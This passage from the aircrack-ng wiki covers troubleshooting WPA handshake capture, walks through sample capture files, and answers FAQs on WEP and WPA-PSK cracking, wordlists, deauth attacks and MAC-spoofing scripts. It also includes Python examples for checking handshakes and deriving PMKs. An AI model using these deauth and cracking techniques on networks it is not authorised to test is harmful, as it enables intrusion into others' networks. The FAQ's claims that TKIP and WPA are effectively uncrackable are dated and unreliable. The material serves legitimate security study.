    Conversely, if you are too close, the received packets can be corrupted and discarded. So do not get too close either.
    Make sure to use the drivers specified on the wiki. Depending on the driver, some old versions do not capture all packets.
    Ideally, connect and disconnect a wireless client normally to generate the handshake.
    If you use the deauth technique, send the absolute minimum of packets to cause the client to reauthenticate. Normally this is a single deauth packet. Sending an excessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four-way handshake. As well, use directed deauths, not broadcast. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not hear the deauthentication packet.
    Try stopping the radio on the client station then restarting it.
    Make sure you are not running any other program/process that could interfere, such as connection managers, Kismet, etc.
    Review your captured data using the WPA Packet Capture Explained tutorial to see if you can identify the problem, such as missing AP packets, missing client packets, etc.

Unfortunately, sometimes you need to experiment a bit to get your card to properly capture the four-way handshake. The point is, if you don't get it the first time, have patience and experiment a bit. It can be done!

Another approach is to use Wireshark to review and analyze your packet capture. This can sometimes give you clues as to what is wrong and thus some ideas on how to correct it. The WPA Packet Capture Explained tutorial is a companion to this tutorial and walks you through what a normal WPA connection looks like. As well, see the FAQ for detailed information on how to use Wireshark.

In an ideal world, you should use a wireless device dedicated to capturing the packets. This is because some drivers such as the RTL8187L driver do not capture packets the card itself sends. Also, always use the driver versions specified on the wiki. This is because some older versions of the drivers such as the RT73 driver did not capture client packets.

When using Wireshark, the filter eapol will quickly display only the EAPOL packets. Based on what EAPOL packets are actually in the capture, determine your correction plan. For example, if you are missing the client packets then try to determine why and how to collect client packets.

To dig deep into the packet analysis, you must start airodump-ng without a BSSID filter and specify the capture of the full packet, not just IVs. Needless to say, it must be locked to the AP channel. The reason for eliminating the BSSID filter is to ensure all packets including acknowledgments are captured. With a BSSID filter, certain packets are dropped from the capture.

Every packet sent by client or AP must be acknowledged. This is done with an acknowledgment packet which has a destination MAC of the device which sent the original packet. If you are trying to deauthenticate a client, one thing to check is that you receive the ack packet. This confirms the client received the deauth packet. Failure to receive the ack packet likely means that the client is out of transmission range. Thus failure.

When it comes to analyzing packet captures, it is impossible to provide detailed instructions. I have touched on some techniques and areas to look at. This is an area which requires effort to build your skills on both WPA/WPA2 plus how to use Wireshark.
aircrack-ng says "0 handshakes"

Check the I Cannot Capture the Four-way Handshake! troubleshooting tip.
aircrack-ng says "No valid WPA handshakes found"

Check the I Cannot Capture the Four-way Handshake! troubleshooting tip.

################################################################

Tutorial: WPA Packet Capture Explained

Version: 1.05 December 15, 2009
By: darkAudax

Files linked to this tutorial: wpa.full.cap wpa.bad.passpharse.cap
Introduction

This is a quick and dirty explanation of two sample WPA capture files. The first file (wpa.full.cap) is a capture of a successful wireless client WPA connection to an access point. The second file (wpa.bad.key.cap) is a capture of a wireless client attempting to use the wrong passphrase to connect to the AP.

This tutorial is a companion to the How to Crack WPA/WPA2 tutorial.

The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly.

To view the capture, use Wireshark to open it then View then Expand All. This shows all the sections and fields expanded. You will need to scroll through the fields for each packet to locate the ones mentioned. See this FAQ entry to learn how to use Wireshark.

The captures were done using a Ralink RT73 chipset and airodump-ng as the capture program.

Being able to read a capture file is an important skill to learn and build on. It allows you to troubleshoot a connection if you are having problems. By understanding this capture, you can then compare it to a live capture and hopefully find out what is going wrong.
Analysis of a successful connection

Use this file: wpa.full.cap
Packet 1

This is the access point (AP) Beacon. It announces the presence and capabilities of the AP.

If you look at the Vendor Specific attributes, you can see the WPA attributes:

Packet 2

This is a Probe Request packet. This is the client looking for the AP. You will notice that the destination MAC is all FFs which is a broadcast address. Plus, you will see that the SSID in the packet is also set to broadcast.

If the AP does not respond to this, you might see the SSID set to the AP SSID. This is what is called a directed Probe Request. The packet capture does not include an example of this.

Packet 3

This is a Probe Response packet. This is the AP responding to the client. It has a source MAC of the BSSID and a destination MAC of the client. The packet informs the client about what capabilities it supports such as transmission speeds plus other relevant capabilities.

Packets 4, 5

These are open authentication system packets.

The client sends an authentication request packet :

 and the AP responds with an authentication acceptance packet:

Packets 6, 7

These are the association packets. Essentially this joins the client to the network.

The client sends an association request packet 

 and the AP responds with an association response packet:

Packets 8, 9, 10, 11

These are the four handshake WPA packets. These are the four critical packets required by aircrack-ng to crack WPA using a dictionary.

Notice that the AP initiates the four-way handshake by sending the first packet. The first pair of packets has a replay counter value of 1. The second pair has a replay counter value of 2. Packets with the same replay counter value are matching sets. If you have only one packet for a specific replay counter value, then its partner is missing from the capture and the packet you do have cannot be used by aircrack-ng. That is why sometimes you have four EAPOL packets in your capture but aircrack-ng still says there are 0 handshakes. You must have matching pairs.

There are some other items to point out if you are analyzing a capture looking for a valid handshake. EAPOL packets 1 and 3 should have the same nonce value. If they don't, then they are not part of the matching set. Aircrack-ng also requires a valid beacon. Ensure this beacon is part of the same packet sequence numbers. For example, if the beacon packet sequence number is higher than the EAPOL packet sequence numbers from the AP, the handshake will be ignored. This is because aircrack-ng resets handshake sets when association packets and similar are seen.

IEEE 802.11 → Frame Control → Flags → DS Status Flag: The direction flags show FROM DS or TO DS depending on the packet, meaning coming from the AP or going to it.
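The two rules above (matching replay-counter pairs, equal ANonce in messages 1 and 3) and the "count the EAPOL packets with a Wireshark eapol filter" check from the cracking tutorial can be applied by a script. This is an added example, not aircrack-ng code. It works on the EAPOL payload alone, so it assumes the 802.11 and LLC/SNAP headers have already been stripped, and it takes direction from the Key ACK flag (set only on frames the AP sends) instead of the DS bits. The sample frames are constructed, with a zero MIC and no key data.

```python
"""Check a set of EAPOL-Key frames for a complete WPA/WPA2 four-way handshake."""
import struct
from collections import defaultdict

# Key Information bits of an EAPOL-Key frame (IEEE 802.11 EAPOL-Key frame format)
KEY_INFO_PAIRWISE = 0x0008
KEY_INFO_INSTALL = 0x0040
KEY_INFO_ACK = 0x0080        # set on frames sent by the AP (messages 1 and 3)
KEY_INFO_MIC = 0x0100
KEY_INFO_SECURE = 0x0200
DESCRIPTOR_VERSION_AES = 0x0002   # HMAC-SHA1-128 MIC / AES key wrap (CCMP networks)


def parse_eapol_key(frame: bytes) -> dict:
    """Extract the fields the handshake check needs from one EAPOL-Key frame."""
    _version, packet_type, body_len = struct.unpack_from(">BBH", frame, 0)
    if packet_type != 3:                      # EAPOL packet type 3 = Key
        raise ValueError("not an EAPOL-Key frame")
    body = frame[4:4 + body_len]
    if len(body) < 95:                        # fixed part of the Key descriptor
        raise ValueError("truncated EAPOL-Key frame")
    descriptor_type, key_info, _key_len, replay_counter = struct.unpack_from(">BHHQ", body, 0)
    return {
        "descriptor_type": descriptor_type,   # 2 = RSN (WPA2), 254 = WPA
        "from_ap": bool(key_info & KEY_INFO_ACK),
        "install": bool(key_info & KEY_INFO_INSTALL),
        "has_mic": bool(key_info & KEY_INFO_MIC),
        "replay_counter": replay_counter,
        "nonce": body[13:45],                 # ANonce on AP frames, SNonce on message 2
    }


def check_handshake(frames) -> dict:
    """Group frames by replay counter and report whether a usable handshake is present."""
    by_counter = defaultdict(list)
    for frame in frames:
        msg = parse_eapol_key(frame)
        by_counter[msg["replay_counter"]].append(msg)

    problems = []
    pairs_per_anonce = defaultdict(int)       # ANonce -> matching AP/client pairs seen
    for counter in sorted(by_counter):
        ap = [m for m in by_counter[counter] if m["from_ap"]]
        sta = [m for m in by_counter[counter] if not m["from_ap"]]
        if len(ap) == 1 and len(sta) == 1:
            pairs_per_anonce[ap[0]["nonce"]] += 1
        else:
            problems.append(f"replay counter {counter}: {len(ap)} AP frame(s) and "
                            f"{len(sta)} client frame(s), not a matching pair")
    # Messages 1/2 and 3/4 use different replay counters but the same ANonce:
    # two matching pairs under one ANonce make a complete handshake.
    complete = any(n >= 2 for n in pairs_per_anonce.values())
    if not complete and len(pairs_per_anonce) > 1:
        problems.append("matching pairs carry different ANonces; they belong to different handshakes")
    return {"eapol_frames": len(frames), "matching_pairs": sum(pairs_per_anonce.values()),
            "complete": complete, "problems": problems}


def build_eapol_key(key_info: int, replay_counter: int, nonce: bytes) -> bytes:
    """Construct a minimal RSN EAPOL-Key frame (zero MIC, no key data) for the samples."""
    body = (struct.pack(">BHHQ", 2, key_info, 16, replay_counter) + nonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16)   # Key IV, Key RSC, Key ID, MIC
            + struct.pack(">H", 0))                         # Key Data Length
    return struct.pack(">BBH", 2, 3, len(body)) + body      # EAPOL version 2, type Key


# Constructed sample frames
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
BASE = DESCRIPTOR_VERSION_AES | KEY_INFO_PAIRWISE
MSG1 = build_eapol_key(BASE | KEY_INFO_ACK, 1, ANONCE)
MSG2 = build_eapol_key(BASE | KEY_INFO_MIC, 1, SNONCE)
MSG3 = build_eapol_key(BASE | KEY_INFO_ACK | KEY_INFO_MIC | KEY_INFO_INSTALL | KEY_INFO_SECURE, 2, ANONCE)
MSG4 = build_eapol_key(BASE | KEY_INFO_MIC | KEY_INFO_SECURE, 2, bytes(32))

FULL_HANDSHAKE = [MSG1, MSG2, MSG3, MSG4]
# The client's message 2 never reached the capture card: counter 1 has only the AP frame.
MISSING_CLIENT_FRAME = [MSG1, MSG3, MSG4]
# Four EAPOL frames yet only one matching pair: the AP retransmitted message 1 (counter 2)
# before the client answered, and message 4 was lost.
FOUR_FRAMES_ONE_PAIR = [
    MSG1,
    build_eapol_key(BASE | KEY_INFO_ACK, 2, ANONCE),
    build_eapol_key(BASE | KEY_INFO_MIC, 2, SNONCE),
    build_eapol_key(BASE | KEY_INFO_ACK | KEY_INFO_MIC | KEY_INFO_INSTALL | KEY_INFO_SECURE, 3, ANONCE),
]

if __name__ == "__main__":
    for name, frames in [("full handshake", FULL_HANDSHAKE),
                         ("missing client frame", MISSING_CLIENT_FRAME),
                         ("four frames, one pair", FOUR_FRAMES_ONE_PAIR)]:
        print(name, "->", check_handshake(frames))
```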

Packet 8:

Packet 9:

Packet 10:

Packet 11:

Packets 12, 13, 14, 15

These are data packets to/from the wireless client to the LAN via the AP. You can view the TKIP Parameters field to confirm that WPA is used for these packets:

So you should now be able to do the same tests with your cards and see what is different.
Analysis of a bad passphrase connection attempt

Use this file: wpa.bad.passpharse.cap
Packet 1

This is the access point (AP) Beacon. It announces the presence and capabilities of the AP.

If you look at the Vendor Specific attributes, you can see the WPA attributes:

Packet 2

This is a Probe Request packet. This is the client looking for the AP. You will notice that the destination MAC is all FFs which is a broadcast address. Plus, you will see that the SSID in the packet is also set to broadcast.

If the AP does not respond to this, you might see the SSID set to the AP SSID. This is what is called a directed Probe Request. The packet capture does not include an example of this.

Packet 3

This is a Probe Response packet. This is the AP responding to the client. It has a source MAC of the BSSID and a destination MAC of the client. The packet informs the client about what capabilities it supports such as transmission speeds plus other relevant capabilities.

Packets 4, 5

These are open authentication system packets. The client sends an authentication request packet and the AP responds with an authentication acceptance packet.

Packet 4:

Packet 5:

Packets 6, 7

These are the association packets. Essentially this joins the client to the network.

The client sends an association request packet 

 and the AP responds with an association response packet.

Packets 8, 9

Up to this point, you will notice that the packets are identical between a successful and failed connection.

These are the first two of the four WPA handshake packets. The AP sends out a packet with information that it expects the wireless client to send back properly encrypted with the passphrase. Since the wireless client is using the wrong passphrase, its reply is incorrect.

Notice that the AP initiates the four-way handshake by sending the first packet.

Packet 8:

Packet 9:

Packets 10, 11, 12, 13, 14, 15

These are really just repeats of packets 8 and 9. The AP is giving the wireless client a chance to correctly answer. It never does. Thus the next packet (16) is a deauthentication packet.

Notice that the AP initiates the four-way handshake by sending the first packet. Each pair has successive replay counter values.

Packet 10:

Packet 11:

Packet 12:

Packet 13:

Packet 14:

Packet 15:

Packet 16

Since the wireless client never successfully proved it had the correct passphrase, the AP now deauthenticates the client. Effectively throwing it off the AP:

Wireshark Usage Tip

In Wireshark, use eapol as a filter. This will show only handshake packets and is useful for analyzing why you don't have the full handshake.

################################################################

FAQ
What version of Aircrack-ng am I running ?

Run 'aircrack-ng | head'. Version information is in the first line of text (second if the empty line is taken into account).
What is the best wireless card to buy ?

Which card to purchase is a hard question to answer. Each person's criteria are somewhat different; for example, one may require 802.11ax capability, or may require it to work via virtualization. Having said that, the following cards are considered the best in class:

    Alfa AWUS036ACH (a/b/g/n/ac) is the best performing card, but the driver can be unstable enough to crash your kernel
    Alfa AWUS036ACM (a/b/g/n/ac) is the highest performing of the STABLE devices, but it requires kernel 4.19.5 or higher, and the driver doesn't work on the Raspberry Pi 3 yet; it works on the Raspberry Pi 4.

Runners-up:

    Alfa AWUS036H [b/g USB]
    Ubiquiti SRC [a/b/g Cardbus]
    Ubiquiti SRX [a/b/g ExpressCard]
    Airpcap series [USB]
    TP-Link TL-WN722N v1 [b/g/n USB] - Beware, if version is not specified by vendor, it is NOT v1
    Alfa AWUS036NHA [b/g/n USB]
    Alfa AWUS051NH v2 [a/b/g/n USB]
    MiniPCIe: anything that uses ath9k, especially AR92xx and AR93xx (ability to do spectral scan)

Also read this first before purchasing. There are many available on the market for fairly low prices. You are simply trading off distance, sensitivity and performance for cost.

If you want to know if your existing card is compatible then use this page: Tutorial: Is My Wireless Card Compatible?
What tutorials are available ?

The Tutorials page has many tutorials specific to the aircrack-ng suite. If your question is not answered on this FAQ page, be sure to check out these other resources:

    The Forum
    User Documentation by platform (Linux, Windows)

The links page also has generic wireless information and tutorials.
Any GPS recommendation ?

The following 2 devices have been tested and work fine:

    BU-353
    NL-402U USB

However, anything that is compatible with GPSd will work.
"command not found" error message

After you enter make install then try to use any of the aircrack-ng suite commands, you get the error message command not found or similar. See the tip with the same message in troubleshooting tips.
How do I crack a static WEP key ?

The basic idea is to capture as much encrypted traffic as possible using airodump-ng. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run aircrack-ng on the resulting capture file. aircrack-ng will then perform a set of statistical attacks developed by a talented hacker named KoreK.

Since that time, the PTW approach (Pychkine, Tews, Weinmann) has been developed. The main advantage of the PTW approach is that very few data packets are required to crack the WEP key.
How many IVs are required to crack WEP ?

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP (64 bit key) can be cracked with 300,000 IVs, and 104-bit WEP (128 bit key) can be cracked with 1,500,000 IVs; if you're out of luck you may need two million IVs, or more.

There is no way to know the WEP key length: this information is kept hidden and never announced, either in management or data packets; as a consequence, airodump-ng can not report the WEP key length. Thus, it is recommended to run aircrack-ng twice: when you have 250,000 IVs, start aircrack-ng with -n 64 to crack 40-bit WEP. Then if the key is not found, restart aircrack-ng (without the -n option) to crack 104-bit WEP.

The figures above are based on using the Korek method. With the introduction of the PTW technique in aircrack-ng 0.9 and above, the number of data packets required to crack WEP is dramatically lowered. Using this technique, 40-bit WEP (64 bit key) can be cracked with as few as 20,000 data packets and 104-bit WEP (128 bit key) with 40,000 data packets. PTW is limited to 40 and 104 bit key lengths. Keep in mind that it can take 100K packets or more even using the PTW method. Additionally, PTW only works properly with selected packet types. Aircrack-ng defaults to the PTW method and you must manually specify the Korek method in order to use it.
How can I know what is the key length ?

You can't know the key length: there is no information about it at all in the wireless packets, which is why you have to try different lengths. Most of the time, it's a 128 bit key.
How do I know my WEP key is correct ?

Just because you seem to have successfully connected to the access point doesn't mean your WEP key is correct! To check your WEP key, the best way is to decrypt a capture file with the airdecap-ng program.
How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay-ng. Also, a good dictionary is required.

FYI, it's not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID.
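The derivation behind that remark, as an added example (not aircrack-ng code): the Pairwise Master Key is PBKDF2-HMAC-SHA1 of the passphrase with the ESSID as salt, 4096 iterations, 256 bits. The block computes it both with the standard library and with PBKDF2 written out step by step, and shows that the same passphrase yields an unrelated PMK on a network with a different name, which is why a precomputed table is only valid for one ESSID. The ESSID "teddy2" is a constructed name; "teddy" and "12345678" are the values from the cracking tutorial.

```python
"""WPA/WPA2 PMK derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32 bytes)."""
import hashlib
import hmac

PMK_ITERATIONS = 4096
PMK_LENGTH = 32          # 256 bits


def pbkdf2_hmac_sha1(password: bytes, salt: bytes, iterations: int, dklen: int) -> bytes:
    """PBKDF2 (RFC 8018, section 5.2) written out so each step is visible."""
    digest_size = hashlib.sha1().digest_size   # 20 bytes per block
    derived = b""
    block_index = 1
    while len(derived) < dklen:
        # U1 = PRF(P, S || INT(i)); Uj = PRF(P, Uj-1); T_i = U1 xor U2 xor ... xor Uc
        u = hmac.new(password, salt + block_index.to_bytes(4, "big"), hashlib.sha1).digest()
        t = int.from_bytes(u, "big")
        for _ in range(iterations - 1):
            u = hmac.new(password, u, hashlib.sha1).digest()
            t ^= int.from_bytes(u, "big")
        derived += t.to_bytes(digest_size, "big")
        block_index += 1
    return derived[:dklen]


def derive_pmk(passphrase: str, essid: str, reference: bool = False) -> bytes:
    """PMK for a WPA/WPA2-PSK network; passphrases must be 8 to 63 characters (see the FAQ)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    password = passphrase.encode("ascii")
    salt = essid.encode("utf-8")              # the ESSID is the salt
    if reference:
        return pbkdf2_hmac_sha1(password, salt, PMK_ITERATIONS, PMK_LENGTH)
    return hashlib.pbkdf2_hmac("sha1", password, salt, PMK_ITERATIONS, PMK_LENGTH)


def same_passphrase_differs_by_essid(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True when one passphrase gives different PMKs on two network names."""
    return derive_pmk(passphrase, essid_a) != derive_pmk(passphrase, essid_b)


if __name__ == "__main__":
    for essid in ("teddy", "teddy2"):
        print(f"{essid:8s} {derive_pmk('12345678', essid).hex()}")
```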
Where can I find good wordlists ?

The easiest way is to do an Internet search for word lists and dictionaries. Also check out web sites for password cracking tools. Many times they have references to word lists. A few sources follow. Please add comments or additions to this thread: https://forum.aircrack-ng.org/index.php?topic=1373.0.

Remember that valid passwords are 8 to 63 characters in length. The Aircrack-ng Other Tips page has a script to eliminate passwords which are invalid in terms of length.

    OpenWall:
        ftp://ftp.openwall.com/pub/wordlists/
        https://www.openwall.com/mirrors/
    GitHub
        https://github.com/danielmiessler/SecLists/tree/master/Passwords
        https://github.com/berzerk0/Probable-Wordlists
        https://github.com/search?q=wordlist
    ftp://ftp.cerias.purdue.edu/pub/dict/
    https://www.outpost9.com/files/WordLists.html
    http://www.vulnerabilityassessment.co.uk/passwords.htm
    https://packetstormsecurity.com/Crackers/wordlists/
    http://ai1.ai.uga.edu/ftplib/natural-language/moby/
    http://wordlist.aspell.net/

How do I recover my WEP/WPA key in windows ?

You have to use WZcook.
Will WPA be cracked in the future ?

It's extremely unlikely that WPA will be cracked just like WEP was.

The major problem with WEP is that the shared key is appended to the IV; the result is directly used to feed RC4. This overly simple construction is prone to a statistical attack, since the first ciphertext bytes are strongly correlated with the shared key (see Andrew Roos' paper). There are basically two counter-measures against this attack:

    Mix the IV and the shared key using a hash function or
    Discard the first 256 bytes of RC4's output.

There has been some disinformation in the news about the flaws of TKIP:

For now, TKIP is reasonably secure but it is also living on borrowed time since it still relies on the same RC4 algorithm that WEP relied on.

Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key, so there's no statistical correlation at all. Furthermore, WPA provides counter-measures against active attacks (traffic reinjection), includes a stronger message integrity code (michael), and has a very robust authentication protocol (the 4-way handshake). The only vulnerability so far is a dictionary attack, which fails if the passphrase is robust enough.

WPA2 (aka 802.11i) is exactly the same as WPA1, except that CCMP (AES in counter mode) is used instead of RC4 and HMAC-SHA1 is used instead of HMAC-MD5 for the EAPOL MIC. Bottom line, WPA2 is a bit better than WPA1, but neither are going to be cracked in the near future.
How do I learn more about WPA/WPA2?

See the links page.
How do I decrypt a capture file ?

You may use the airdecap-ng program.
What are the authentication modes for WEP ?

There are two authentication modes for WEP:

    Open System Authentication: This is the default mode. All clients are accepted by the AP, and the key is never checked, meaning association is always granted. However, if your key is incorrect you won't be able to receive or send packets (because decryption will fail), so DHCP, ping etc. will time out.
    Shared Key Authentication: The client has to encrypt a challenge before association is granted by the AP. This mode is flawed and leads to keystream recovery, so it's never enabled by default.

The NetGear Wireless Basics Manual has a good description of WEP Wireless Security including diagrams of the packet flows in its subsections.
How do I merge multiple capture files ?

You may use File → Merge in Wireshark or Ethereal. Make sure to export in pcap format.

From the command line you may use the mergecap program to merge .cap files (part of the Wireshark/Ethereal package or the win32 distribution):

mergecap -F pcap test1.cap test2.cap test3.cap -w out.cap

It will merge test1.cap, test2.cap and test3.cap into out.cap

mergecap -F pcap *.cap -w out.cap

It will merge all the .cap files contained in the current folder into out.cap

You may use the ivstools program to merge .ivs files (part of the aircrack-ng package).
Can I convert cap files to ivs files ?

You may use the ivstools program (part of the aircrack-ng package).
Can I use Wireshark/Ethereal to capture 802.11 packets ?

Under Linux, simply set up the card in monitor mode with the airmon-ng script. Under Windows, Wireshark can capture 802.11 packets using AirPcap. Except in very rare cases, Ethereal cannot capture 802.11 packets under Windows.
Can Wireshark/Ethereal decode WEP or WPA data packets ?

Recent versions of Ethereal and Wireshark can decrypt WEP. Go to Edit → Preferences → Protocols → IEEE 802.11, select 1 in the WEP key count and enter your WEP key below.

Wireshark 0.99.5 and above can decrypt WPA as well. Go to Edit → Preferences → Protocols → IEEE 802.11, select Enable decryption, and fill in the key according to the instructions in the preferences window. You can also select Decryption Keys from the wireless toolbar if it's displayed.

Many times in this forum and on the wiki we suggest using Wireshark to review packets. There are two books which are available specifically for learning how to use Wireshark in detail.

The good news is that they have made Chapter 6 of the Wireshark & Ethereal Network Protocol Analyzer Toolkit covering wireless packets available online in PDF format. Here is the link to Chapter 6. As well, see this section on the Wireshark Wiki.
What are the different wireless filter expressions ?

The Wireshark display filter reference lists wlan (general 802.11), wlan_mgmt (802.11 management), wlancap (AVS capture header), wlancertextn (802.11 certificate extensions), and radiotap (radiotap header).
How do I change my card's MAC address ?

Note: It is not necessary to change the MAC address anymore to perform attacks; this can, in some cases, confuse the driver.

Under linux, the following information applies.

One method is:

ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Be aware that the example above does not work with every driver.

The easier way is to use the macchanger package. The documentation and download is at: macchanger.

If you are using mac80211 drivers and have a mon0 interface then:

 ifconfig mon0 down
 
 macchanger -a mon0
 Current MAC: 00:0f:b5:88:ac:82 (Netgear Inc)
 Faked MAC:   00:b0:80:3b:1e:1f (Mannesmann Ipulsys B.v.)
 
 ifconfig mon0 up
 macchanger -s mon0
 Current MAC: 00:b0:80:3b:1e:1f (Mannesmann Ipulsys B.v.)

IMPORTANT: In the following scripts, note that newer versions of the madwifi-ng driver have deprecated (meaning discontinued) the -bssid option. If you get a warning to this effect, use -uniquebssid instead.

Here are scripts which use the macchanger package and work well with madwifi-ng drivers:

Script 1 - Invoked with macc.sh XX:XX:XX:XX:XX:XX

 #!/bin/sh
 cardctl eject
 cardctl insert
 wlanconfig ath0 destroy
 ifconfig wifi0 up
 ifconfig wifi0 down
 macchanger wifi0 -m $1
 wlanconfig ath0 create wlandev wifi0 wlanmode monitor -bssid

Script 2 - For madwifi-ng driver devices

 #!/bin/sh
 # by darkAudax
 # Change the following variables to match your requirements
 FAKEMAC="00:14:6C:71:41:32"
 IFACE="ath0"
 WIFACE="wifi0"
 #
 # The interface is brought up and down twice otherwise
 # it causes a system exception and the system freezes
 #
 ifconfig $IFACE down
 wlanconfig $IFACE destroy
 wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor -bssid
 ifconfig $IFACE up
 ifconfig $IFACE down
 macchanger $WIFACE -m $FAKEMAC
 wlanconfig $IFACE destroy
 wlanconfig $IFACE create wlandev $WIFACE wlanmode monitor -bssid
 ifconfig $IFACE up
 ifconfig $IFACE
 iwconfig
 echo " "
 echo "The wireless card MAC has been set to $FAKEMAC"
 echo " "

Script 3 - For madwifi-ng driver devices

 #!/bin/bash
 #
 # athmacchange.sh - Atheros MAC Changer
 # by brad a
 # foundstone
 #
 
 if [ -z "$1" ]; then
    echo Atheros MAC Changer
    echo -----------------------
    echo IMPORTANT: this assumes we want to change the MAC of wifi0
    echo " if you want to change the MAC of another wifi interface"
    echo " (i.e. wifi1, wifi2, etc...) change the script!"
    echo
    echo "usage: $0 [mac]"
    echo
    exit 1
 fi
    
 echo Atheros MAC Changer
 echo -------------------------
 echo -Destroying VAPs:
    
 # every entry under /proc/net/madwifi is a VAP (ath0, ath1, ...)
 for i in $( ls /proc/net/madwifi ); do
    # discard both stdout and stderr of wlanconfig
    wlanconfig "$i" destroy > /dev/null 2>&1
    echo -e "\t$i - destroyed"
 done
  
 echo -Downing wifi0
 ifconfig wifi0 down
 
 echo -Using macchanger to change MAC of wifi0
 macchanger -m "$1" wifi0
 
 echo -Bringing wifi0 back up
 ifconfig wifi0 up
 
 echo -Bringing up one VAP in monitor mode
 wlanconfig ath create wlandev wifi0 wlanmode monitor -bssid > /dev/null
 
 echo -All done!
 echo -Confirm your settings:
 echo ------------------------------------------------------
 ifconfig wifi0
 echo ------------------------------------------------------

Madwifi-ng Notes: The madwifi site has a detailed documentation page on changing the MAC address under madwifi-ng: How can I change the MAC address of my card? Starting in r2435 of the madwifi-ng driver, they changed the default way in which new VAPs get their MAC address. When creating a new VAP with wlanconfig, you must specify -bssid to have it use the underlying MAC address. If you don't do this, then the new VAP gets a unique MAC. This will cause problems with various aircrack-ng commands.

Under Windows, you may use:

    macmakeup
    Technitium MAC Address Changer

Troubleshooting Tip: A normal MAC address looks like this: 00:09:5B:EC:EE:F2. The first half (00:09:5B) of each MAC address is the manufacturer. The second half (EC:EE:F2) is unique to each network card. Many access points will ignore invalid MAC addresses. So make sure to use a valid wireless card manufacturer code when you make up MAC addresses. Otherwise your packets may be ignored.
Is my card compatible with airodump-ng / aireplay-ng ?

Read the Tutorial: Is My Wireless Card Compatible? tutorial. Then check the Compatible Cards page.
Can I have multiple instances of aireplay-ng running at the same time?

Yes, you can.
How do I use spaces, double quotes, single quotes, etc. in AP names?

    You have to prefix those special characters with a \. This is called escaping a special character. Examples: with\'singlequote, with\"doublequote.
    You also need to handle the & symbol the same way. Example: A\&B.
    You can enclose the name in single quotes. Examples: 'with space', 'with"doublequote'.
    As well, you can use double quotes. Examples: "with space", "with'singlequote".

NOTE: If you enclose the AP name in single or double quotes, then you don't also need to escape special characters within the single or double quotes.

IMPORTANT EXCEPTION: If the AP name contains ! then special care must be taken. The reason is that the bash interpreter thinks you want to repeat a previous command. Your options are:

    Use single quotes as in 'name!with!bang'.
    Escape the ! as in name\!with\!bang.
    Use double quotes plus the escape as in "name\!with\!bang".

Sometimes the AP name contains leading or trailing spaces. These can be very hard to identify from the airodump-ng screen. Here are a few methods to deal with this situation:

    The airodump-ng text file includes the SSID (AP name) length. So you can compare the length in the text file to the count of visible characters. If the airodump-ng text file count is greater, then you know that the SSID has leading or trailing spaces.
    Use wireshark to look at the beacon. Unless the SSID is hidden, the SSID is in quotes and you should be able to see leading/trailing spaces.
    The 1.0rc1 version of aireplay-ng will automatically pull the correct SSID from the beacon for you assuming it is not hidden. Simply omit the SSID parameter from aireplay-ng.

What is the size of ARP packets ?

When captured through a wireless interface, 68 bytes is typical for ARP packets originating from wireless clients, and 86 bytes is typical for ARP requests from wired clients.

On Ethernet, ARP packets when received are typically 60 bytes long. When this is then relayed by a wireless access point, they are 86 bytes. This is, of course, because of the wireless headers. If a wireless client sends an ARP, they are typically 42 bytes long and they become 68 when relayed by the AP.
How can I resolve MAC addresses to IP addresses ?

You can try netdiscover or ARP tools
What are the allowed rates ?

Modulation      Allowed rates
DSSS / CCK      1M, 2M, 5.5M, 11M
OFDM (a/g)      6M, 9M, 12M, 24M, 36M, 48M, 54M
What is the frequency for each channel?

To determine the frequency that a channel uses (or vice versa), check out: Wifi Channels. Or check out Wikipedia List of WLAN Channels. This is a nice graphic showing the channel assignments and their overlap.
How do I convert the HEX characters to ASCII?

Here are some conversion links. Remember to put % in front of each hex byte (each pair of hex digits) when going from hex to ASCII.

    https://www.rapidtables.com/convert/number/hex-to-ascii.html
    http://www.mikezilla.com/exp0012.html

LatinSuD has developed a very useful tool - Javascript WEP Conversion Tool. It can perform a variety of WEP, ASCII and passphrase conversions.
Does the aircrack-ng suite support Airpcap adaptor?

See airpcap.
I have a Prism2 card, but airodump-ng / aireplay-ng doesn't seem to work !

First, make sure you aren't using the orinoco driver. If the interface name is wlan0, then the driver is HostAP or wlan-ng. However if the interface name is eth0 or eth1, then the driver is orinoco and you must disable the driver. The easiest way to do this is to blacklist it in /etc/modprobe.d/blacklist.

Also, it can be a firmware problem. Old firmwares have trouble with test mode 0x0A (used by the HostAP / wlan-ng injection patches), so make sure yours is up to date (see Prism2 flashing for instructions). The recommended station firmware version is 1.7.4. If it doesn't work well (kismet or airodump-ng stalls after capturing a couple of packets), try STA 1.5.6 instead (either s1010506.hex for old Prism2 cards, or sf010506.hex for newer ones).

On a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems stuck, you will have to reset it, or use HostAP instead. Injection is currently broken on Prism2 USB devices with wlan-ng.
I have an Atheros card, and the madwifi patch crashes the kernel / aireplay-ng keeps saying enhanced RTC support isn't available

There are quite a few problems with some versions of the Linux 2.6 branch (especially before 2.6.11 was released) that will cause a kernel panic when injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is just broken. Thus, it is highly recommended to use either Linux 2.6.11.x or newer.
Why do I have bad speeds when I'm too close to the access point?

